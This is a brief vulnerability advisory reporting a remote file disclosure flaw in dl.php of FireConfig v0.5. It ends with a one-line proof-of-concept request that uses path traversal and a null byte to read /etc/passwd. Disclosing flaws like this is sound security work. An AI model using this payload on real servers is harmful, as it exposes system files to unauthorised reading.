FireConfig version 0.5 suffers from a remote file disclosure vulnerability in dl.php.
5ac06960677d27bac2d19a384d86dce491a168dc67614b7b03fbe1c5f6cea201
FireConfig v0.5 (dl.php file) Remote File Disclosure Vulnerability
http://heanet.dl.sourceforge.net/sourceforge/fireconfig/fireconfig_v0.5.tar.gz
POC :
/dl.php?file=../../../../../../etc/passwd%00